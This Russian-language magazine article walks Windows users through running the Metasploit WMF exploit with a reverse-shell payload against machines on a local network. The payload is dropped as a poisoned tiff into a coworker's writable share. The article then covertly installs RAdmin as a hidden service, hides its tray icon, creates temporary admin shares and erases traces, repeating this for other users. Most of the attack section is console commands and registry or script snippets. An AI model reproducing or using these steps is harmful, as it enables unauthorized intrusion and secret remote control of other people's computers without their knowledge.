• Партнер

  • Кто не слышал про WMF-баг, с помощью которого можно получить шелл-доступ к
    практически любому компьютеру использующему системную библиотеку для обработки
    WMF-файлов? Наверное мало кто, особенно после разгромной статьи в
    февральском номере
    журнала
    . Однако, многие Win-пользователи, читающие журнал ][, не смогли его
    использовать по следующим причинам:

    1. Отсутствие доступа к никсовому шеллу на удалённом компьютере;
    2. Слабое знание других систем: FreeBSD, LINUX;

    Возникает вопрос: зачем ломать WIN–компьютеры с никсовых шеллов? Почему бы не
    протестировать эксплоит в родной среде, спросите вы? Не будем разбирать
    экзотические варианты, типа работы под Virtual PC или WMWARE альтернативных
    систем, а также Cygwin (хотя без него не обойтись, смотри далее). Сделаем всё
    проще, запустим перловый эксплоит в Windows.

    Всё протестировано на двух Windows XP
    SP2 в локальной сети и работает.

    На диске ][ лежал пакет Metasploit Fгаmеwork - но он для никсов! Хотя и в его
    составе есть сплоит ie_xp_pfv_metafile.pm. На практике, при запуске в Active
    perl for Win32, он не работает, точнее не работает весь пакет Metasploit
    Fгаmеwork 2.5. Идём по ссылке

    http://www.metasploit.com/projects/Framework/downloads.html
    и скачиваем -
    “Metasploit fгаmеwork 2.5 Win32 Cygwin Installer”, запускаем MSFConsole , делаем
    ls exploits и с сожалением обнаруживаем, что ie_xp_pfv_metafile.pm там нет! Вот
    облом... Где взять? Ответ прост: на DVD ][ или скачать Metasploit ifгаmеwork 2.5
    для никсов – в этом пакете он присутствует! То есть достаточно его
    перекопировать в папку exploits и пользоваться на здоровье. Вот так, для
    Win-пользователей всё упрощается.

    Что делать дальше, когда вы получили шелл-доступ с правами системы к
    удалённому компьютеру с Windows, зависит от вашей фантазии. Для примера
    расскажу, что можно сделать в локальной сети для пользы (точнее для упрощённого
    администрирования WIN-систем администратором).

    1. Удалённая скрытая установка RAdmin

    Не всегда есть доступ к компьютеру пользователя (компьютер занят
    пользователем, далеко и т. д.). Поэтому воспользуемся WMF – багом и поставим на
    его компьютер RA удалённо, по локальной сети. Как правило (у нас в локалке,
    например) каждый юзверь имеет расшаренную папку, разрешённую для записи и в
    основном пользуется стандартным проводником (никуда от него не деться –
    стандартная оболочка, используется в любой программе – файл\открыть
    файл\сохранить).

    Запускаем консоль MSFConsole и дальше:

    msf > use ie_xp_pfv_metafile – будем использовать сплоит для WMF
    msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse – цепляем реверс-шелл для
    win32
    PAYLOAD -> win32_reverse
    msf ie_xp_pfv_metafile(win32_reverse) > set LHOST ххх.ххх.ххх.ххх –
    устанавливаем IP куда будет коннектится реверс-шелл
    LHOST -> xxx.xxx.xxx.xxx
    msf ie_xp_pfv_metafile(win32_reverse) > exploit – запускаем эксплоит
    [*] Starting Reverse Handler.
    [*] Waiting for connections to http://ххх.ххх.ххх.ххх:8080/ - поднимается
    Web-сервер на ранее указанном адресе и ждёт подключений.

    Через IE на нашей системе зайдём на этот Web-сервер и опа… взломаем сами себя
    (ну это не страшно). В консоли сделаем exit и не будем над собой издеваться.

    Теперь зайдём в IE в Сервис\Свойства\Общие\Параметры…\Просмотр файлов…. И
    найдём ядовитый tiff-файл, содержащий шелл-код, имя файла будет что-то типа
    «M16R14KtkTuEys0Iqt9M4vqK3ny4Kh1vem[2].tiff». Остаётся скопировать этот файл в
    папку юзверя (предварительно подняв web-сервер ещё раз на своём компьютере) и
    ждать когда он откроет папку, содержащую наш ядовитый файл с шелл-кодом.

    Дождались соединения, юзверь в этот момент ничего не заметит (если не
    посмотрит в процессы и не увидит там cmd.exe).

    Дальше зальём ему RA (предварительно упаковав в SFX-архив RA.exe сам
    r_server.exe и две необходимые библиотеки AdmDll.dll, raddrv.dll, а так же
    reg-файл для скрытия иконки r_server`a в трее Hide_RA.reg – он меняет один ключ,
    вот его содержание:

    Windows Registry Editor Version 5.00
    [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
    "DisableTrayIcon"=hex:01,00,00,00

    Примечание:

    Для упаковки в SFX-архив (самораспаковывающийся архив) использовал WinRAR v.
    3.2 со следующими параметрами:

    Path=.\%SystemRoot%\system32\
    SavePath
    Silent=1
    Overwrite=2

    Можете задать другие, но на мой взгляд это оптимальные. Далее в консоли (уже
    в консоли cmd) пишем:

    cd \ `перейти в корень
    диска

    cd %SystemRoot%\system32 `
    задаём текущую папку
    system32

    net share C$$=C: `
    расшариваем диск C: юзверя – он
    невидим в сетевом окружении

    net share D$$=D: `
    расшариваем диск D: тоже (не
    знаем где система стоит, может и на D:)

    copy /y \\имя компьютера_\Папка_RA\ra.exe %SystemRoot%\system32 `
    копируем
    архив RA в системную папку юзверя

    cmd /c ra.exe `
    распаковываем всё необходимое для
    установки r_server и запуска его в скрытом режиме

    r_server /install /silence `
    инсталлируем
    r_server.exe в скрытом режиме как службу

    reg import Hide_RA.reg `
    скрываем иконку
    r_server.exe в трее

    r_server /start /silence `
    запускаем скрытно службу
    r_server.exe

    `
    Всё, r_server.exe ждёт подключений клиента…
    delete ra.exe `
    удаляем архив

    net share C$$ /delete `
    удаляем шары
    net share D$$ /delete
    exit `
    выходим из консоли cmd

    Можно включить в архив run.cmd файл вида:

    r_server /silence /install
    reg import Hide_RA.reg
    r_server /silence /start
    delete ra.exe
    net share C$$ /delete
    net share D$$ /delete
    exit

    Тогда после «cmd /c ra.exe» в консоли надо запустить на исполнение его,
    например так:

    cmd /c run.cmd `инсталлируем
    и запускаем службу r_server, затем убираем следы

    exit `
    выходим из консоли cmd (шелла удалённого
    компьютера) в консоль MFS

    msf ie_xp_pfv_metafile(win32_reverse) > exploit `и
    так далее остальных юзверей…

    2. Удалённое превращение Windows_XP_SP2 в сервер win-терминалов.

    Компьютер с сервером терминалов позволяет подключится к нему по типу
    удалённого рабочего стола, только без выхода из системы основного пользователя,
    а в отдельном сеансе, т. е. позволит работать за компьютеров как минимум двум
    пользователям одновременно, одному из них удалённо.

    Работы ведутся. Продолжение следует?

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии